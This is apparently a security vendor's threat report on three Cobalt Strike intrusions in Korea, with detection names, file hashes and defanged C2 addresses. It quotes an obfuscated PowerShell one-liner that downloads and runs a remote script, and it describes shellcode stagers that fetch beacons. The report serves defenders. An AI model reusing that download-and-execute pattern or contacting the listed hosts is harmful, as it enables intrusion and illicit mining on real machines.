The ASEC analysis team is monitoring attacks that utilize the Cobalt Strike hacking tool. In this article, the team will examine the latest Cobalt Strike attacks which were confirmed after the publishing of the past article that introduced the Cobalt Strike hacking tool.
An attack confirmed on April 23 revealed that the Cobalt Strike beacon was run by the process that possesses the command line shown below. Cobalt Strike threat actors usually designate and run the normal process after giving it a specific parameter, and then inject the actual backdoor beacon to disguise the attack as a normal process. This is a feature that is actually supported by the Cobalt Strike hacking tool.
svchost.exe -k LocalServiceNetworkRestricted
Before the beacon process shown above was run, the following obfuscated powershell command line log was confirmed.
powershell.exe “$dadf=’IEX(New-Object Net.WebClient).D’;$ien=’ownloadString(”hxxp://hcut.co[.]kr/api/runtime.ps1”)’;$nv3=’IEX(New-Object Net.WebClient).Do’;$qc=’wnloadString… (omitted)
The downloaded runtime.ps1 is actually Invoke-Shellcode.ps1, which is a powershell script provided by other powershell-based attack tools: PowerSploit and Empire. As its name suggests, Invoke-Shellcode has the feature of downloading the shellcode payload through the parameter and executing it. Thus, it is assumed that Cobalt Strike was installed through Invoke-Shellcode.ps1.
– runtime.ps1: Invoke-Shellcode.ps1 (download URL: hxxp://hcut.co[.]kr/api/runtime.ps1)
Records show that after the installation, Cobalt Strike created info-obtaining malware and CoinMiner malware as shown below.
– na.exe: Obtain Hardware Information
– 1.exe: XMRig CoinMiner Injector. Unable to run normally.
– 2.exe: XMRig CoinMiner Injector. Unable to run normally.
Note that the infected system already has a history of having Cobalt Strike and CoinMiner malware installed.
– 2008.exe: Cobalt Strike Stager (beacon download URL: hxxp://103.39.108[.]20:2008/cDIl)
– 2008a.exe: Cobalt Strike Stager (beacon download URL: hxxp://103.39.108[.]20:2008/eZ5h)
– bits_se.exe: Cobalt Strike Stager (beacon download URL: hxxp://103.39.108[.]20:2008/cDIl)
– k64.src: Cobalt Strike Stager (beacon download URL: hxxp://www.pc1024[.]net:3322/NDaj)
– shellcode.dll: Cobalt Strike Stager (beacon download URL: hxxp://103.39.108[.]20:2008/yGYC)
– 51032u.exe: CoinMiner Installer
– avmi.exe: XMRig CoinMiner
– xmrig.exe: XMRig CoinMiner
– svchost.exe: NSSM Service Manager
Next, there was an attack confirmed on March 16. The company where the malware was distributed is assumed to be an affiliate of a certain company. It was discovered that a powershell process was attempting to run a malicious script (%temp%\tmp5O91.ps1) in a certain folder to download the beacon.
Base64 decoding process is skipped for the script and it goes through the XOR (0x35) operation and loads the shellcode to the memory.
The shellcode above takes the form of ‘Stager’ and attempts to download the beacon from C2 (pilottrustme[.]top, 54.238.214[.]219) located at the very bottom. However, as the connection is currently unavailable, the team is unable to check the latest information about the beacon.
Lastly, a case of infection occurred in a certain university in Korea on March 26. The confirmed sample, named msvcruntime.exe, was distributed without the Time Date Stamp (build time) value. It used an open-source packer ‘PEzor’ and ultimately executed a specific shellcode. The shellcode that is executed at the end is a shellcode that downloads the beacon, and it’s called Cobalt Strike’s ‘Stager’ payload.
The C2 domain that the shellcode connects to is ‘oxoo[.]cc’ on the bottom left. As of now, the page cannot be connected and is showing the ‘404 Not Found’ message, meaning the team is unable to download the beacon to check its information.
AhnLab products are equipped with process memory-based detection method and behavior-based detection feature that can counter the beacon backdoor which is used from the Cobalt Strike’s initial invasion stage to spread internally.
– Trojan/PowerShell.InvokeShell (2021.04.27.00)
– Infostealer/Win.Sysinfo.C4439416 (2021.04.26.03)
– CoinMiner/Win.XMRig.C4439427 (2021.04.27.00)
– Trojan/Win32.CobaltStrike.R329694 (2020.11.26.06)
– Malware/Win32.Generic.C1883131 (2017.03.27.01)
– Trojan/Win32.RL_Generic.R292199 (2019.09.20.01)
– Trojan/Win32.Wacatac.R355370 (2020.11.11.02)
– CoinMiner/Win.Agent.C4439419 (2021.04.26.03)
– Trojan/Win64.XMR-Miner.R226842 (2019.12.11.01)
– Unwanted/Win.NSSM.C4439418 (2021.04.26.03)
– Trojan/PS.Cobalt (2021.04.06.00)
– Trojan/Win.CobaltStrike.C4399063 (2021.04.01.01)
– runtime.ps1 : 7facee76cab5717349fe6c2d913a1961
– na.exe : b9a376b33f6307c8c2669360ae2dae01
– 1.exe : 7f2fb6bac0ecd067cf1f183ee07bc95c
– 2.exe : d8b503bedaa4077fa566c25c6c4b8f32
– 2008.exe : ff2af38bf23d9a6b1f8da12626c5f6a4
– 2008a.exe : 9917e7ef06e7fc2761144c4abef0cdc2
– bits_se.exe : 6d853d078b9865dd3d6aba653d42083b
– k64.src : 179e60db8beeecfe14b2c1ea922e65e3
– shellcode.dll : 17730a73ffbb0e6145658783e5207d6d
– 51032u.exe : 6c1feef64ae04ce2f45b703706c43ef5
– avmi.exe : a2074ca640b5a57662622e49ac742bb1
– xmrig.exe : 0ea5d36707f6d07b82a1f9d707d4c913
– svchost.exe : 6e64c6b59e22247b0f07db49ea651cc8
– tmp5O91.ps1 : d782dd504419ef0699d65cfa8c673700
– msvcruntime.exe : f990c4df6a580794cb6fd1d4fafe64b8
– www. pc1024[.]net:3322/NDaj